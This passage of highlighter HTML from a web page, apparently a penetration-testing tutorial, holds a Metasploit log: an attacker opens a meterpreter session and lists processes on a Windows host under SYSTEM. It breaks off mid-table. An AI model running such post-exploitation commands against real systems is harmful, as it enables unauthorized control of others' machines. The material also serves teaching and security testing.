data-line=\"crayon-55f29ee9765d0910404999-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-59\">59<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee9765d0910404999-1\" class=\"crayon-line\"><span class=\"crayon-e\">msf <\/span><span class=\"crayon-e\">exploit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">handler<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-v\">sessions<\/span> <span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">i<\/span> <span class=\"crayon-cn\">1<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-2\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">]<\/span> <span class=\"crayon-e\">Starting <\/span><span class=\"crayon-e\">interaction <\/span><span class=\"crayon-i\">with<\/span> <span class=\"crayon-cn\">1&#8230;<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-3\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-4\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-v\">meterpreter<\/span> <span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-e\">ps<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-5\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-6\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-e\">Process <\/span><span class=\"crayon-v\">List<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-7\" class=\"crayon-line\"><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><span class=\"crayon-o\">===<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-8\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-9\" class=\"crayon-line\"><span class=\"crayon-e\">PID\u00a0\u00a0 <\/span><span class=\"crayon-e\">PPID\u00a0\u00a0<\/span><span class=\"crayon-e\">Name\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">Arch\u00a0\u00a0<\/span><span class=\"crayon-e\">Session\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">User\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-v\">Path<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-10\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-11\" class=\"crayon-line\"><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-e\">System <\/span><span class=\"crayon-v\">Process<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-cn\">4294967295<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-12\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">System\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-13\" class=\"crayon-line\"><span class=\"crayon-cn\">256<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">smss<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">SystemRoot<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">System32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">smss<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-14\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">352<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">328<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">csrss<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">csrss<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-15\" class=\"crayon-line\"><span class=\"crayon-cn\">364<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">msdtc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">NETWORK <\/span><span class=\"crayon-i\">SERVICE<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">System32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">msdtc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-16\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">408<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">328<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">wininit<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">wininit<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-17\" class=\"crayon-line\"><span class=\"crayon-cn\">416<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">400<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">csrss<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">csrss<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-18\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">452<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">400<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">winlogon<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">winlogon<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-19\" class=\"crayon-line\"><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">408<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">services<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">services<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-20\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">520<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">408<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">lsass<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">lsass<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-21\" class=\"crayon-line\"><span class=\"crayon-cn\">528<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">408<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">lsm<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">lsm<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-22\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">628<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-23\" class=\"crayon-line\"><span class=\"crayon-cn\">700<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">NETWORK <\/span><span class=\"crayon-i\">SERVICE<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-24\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">788<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">LOCAL <\/span><span class=\"crayon-i\">SERVICE<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">System32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-25\" class=\"crayon-line\"><span class=\"crayon-cn\">844<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">System32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-26\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">872<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">512<\/span><span 